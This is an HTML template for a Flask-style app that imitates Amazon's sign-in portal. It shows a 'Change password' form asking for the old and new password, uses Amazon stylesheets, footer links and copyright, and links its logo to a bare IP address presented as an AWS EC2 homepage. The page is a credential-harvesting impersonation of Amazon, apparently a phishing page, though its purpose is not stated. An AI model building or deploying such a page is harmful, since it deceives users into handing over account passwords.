<!DOCTYPE html>
<html>
<head>
<title dir="ltr">Amazon Change Password</title>
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/61Brdu0o6LL._RC|11Fd9tJOdtL.css,21y5jWQoUML.css,31Q3id-QR0L.css,31P8A7PnBZL.css_.css#AUIClients/AmazonUI.min">
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/01SdjaY0ZsL._RC|41i8aEvLYXL.css,21EmREG-NIL.css_.css#AUIClients/AuthenticationPortalAssets.debug.secure-true.min">
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/CVFAssets-e91ba5c6e67c58c7f9c4c413fa67697feade389e._V2_.css#AUIClients/CVFAssets.debug.secure-true.min">
    <link rel="stylesheet" href="https://a0.awsstatic.com/main/css/1.0.391/style.css">
  <link rel="stylesheet"
href="https://a0.awsstatic.com/libra-css/css/1.0.190/style-awsm.css">
  <link rel="stylesheet" 
href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <link href="https://a0.awsstatic.com/libra-css/css/1.0.202/vendor/fontawesome.css" rel="stylesheet" type="text/css">
 <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/61Brdu0o6LL._RC|11Fd9tJOdtL.css,21y5jWQoUML.css,31Q3id-QR0L.css,31P8A7PnBZL.css_.css#AUIClients/AmazonUI.min">
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/01SdjaY0ZsL._RC|41i8aEvLYXL.css,21EmREG-NIL.css_.css#AUIClients/AuthenticationPortalAssets.debug.secure-true.min">
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/CVFAssets-e91ba5c6e67c58c7f9c4c413fa67697feade389e._V2_.css#AUIClients/CVFAssets.debug.secure-true.min">

</head>

<head id="aws-page-header" class="awsm" role="banner" style="margin-bottom:120px;">
   <div id="aws-nav" class="aws-nav" role="navigation">
    <div class="aws-nav-header">
     <!-- Left header with filter dropdown and aws logo TODO put back in
products to have dropdown
         for all ec2 instances --> 
      <div class="aws-bg-logo lb-bg-logo
aws-amazon_web_services_smile-header-desktop-en">
       <a href="http://35.176.100.32"><span>Click here to return to Amazon Web
Services EC2 Instances homepage</span></a>
      </div>
        <div style="margin: auto; width: 50%; padding: 15px;" class="a-section a-spacing-medium a-text-center">
    </div>
      
     </div>
     </div>
  </head>

<body>
<div id="authportal-center-section" class="a-section">
<div id="authportal-main-section" class="a-section">
<div class="a-section a-spacing-base auth-pagelet-container">
<div id="auth-cookie-warning-message"><div class="a-alert-content">
<p>
<a class="a-link-normal" href="/gp/help/customer/display.html/ref=ap_cookie_error_help?">
</a>
</p>
</div></div></div>
</div>
<div class="a-section auth-pagelet-container">

<div class="a-section a-spacing-base">
  <div class="a-section">
    <form name="signIn" method="post" class="auth-validate-form auth-real-time-validation a-spacing-none fwcim-form">
    <div class="a-section">
    <div class="a-box"><div class="a-box-inner a-padding-extra-large">
      <h1 class="a-spacing-small">
          Change password
      </h1>
      {% for message in get_flashed_messages() %}
      <div class="flash">{{ message }}</div>
      {% endfor %}
          <!-- optional subheading element -->
      <div class="a-row a-spacing-base">
        <label for="old_password" class="a-form-label">
          Old password:
        </label>
        <input type="password" id="ap-credential-autofill-hint" name="oldpassword" class="a-input-text a-span12">
        <label for="new_password" class="a-form-label">
          New password:
        </label>
        <input type="password" id="ap-credential-autofill-hint" name="newpassword" class="a-input-text a-span12">
    <div id="auth-email-missing-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
    </div></div></div>
    </div>

    <div class="a-section">
            
    <span id="continue" class="a-button a-button-span12 a-button-primary"><span class="a-button-inner"><input id="continue" tabindex="5" class="a-button-input" type="submit" aria-labelledby="continue-announce"><span id="continue-announce" class="a-button-text" aria-hidden="true">
              Confirm change
            </span></span></span>
    
    </div>

    <div class="a-section">
      <div aria-live="polite" class="a-row a-expander-container a-expander-inline-container">
        <a href="{{ url_for('dashboard') }}" class="a-expander-header a-declarative a-expander-inline-header a-link-expander" ><i class="a-icon a-icon-expand"></i><span class="a-expander-prompt">
          Back to dashboard
        </span></a>
      </div>
    </div>
          
        </div></div>
      </div>
    </form>
  </div>
        
</div>
            </div>
      </div>
  
</body>
    
<div class="a-section a-spacing-top-extra-large auth-footer">

<div class="a-divider a-divider-section"><div class="a-divider-inner"></div></div>

<div class="a-section a-spacing-small a-text-center a-size-mini">
<span class="auth-footer-seperator"></span>

    <a class="a-link-normal" target="_blank" rel="noopener" href="https://www.amazon.com/gp/help/customer/display.html/ref=ap_desktop_footer_cou?ie=UTF8&nodeId=508088">
      Conditions of Use
    </a>
    <span class="auth-footer-seperator"></span>

    <a class="a-link-normal" target="_blank" rel="noopener" href="https://www.amazon.com/gp/help/customer/display.html/ref=ap_desktop_footer_privacy_notice?ie=UTF8&nodeId=468496">
      Privacy Notice
    </a>
    <span class="auth-footer-seperator"></span>
  
    <a class="a-link-normal" target="_blank" rel="noopener" href="https://www.amazon.com/gp/help/customer/display.html">
      Help
    </a>
    <span class="auth-footer-seperator"></span>
  
</div>

<div class="a-section a-spacing-none a-text-center">
<span class="a-size-mini a-color-secondary">
  © 1996-2018, Amazon.com, Inc. or its affiliates
</span>

</div>

</div>

</html>
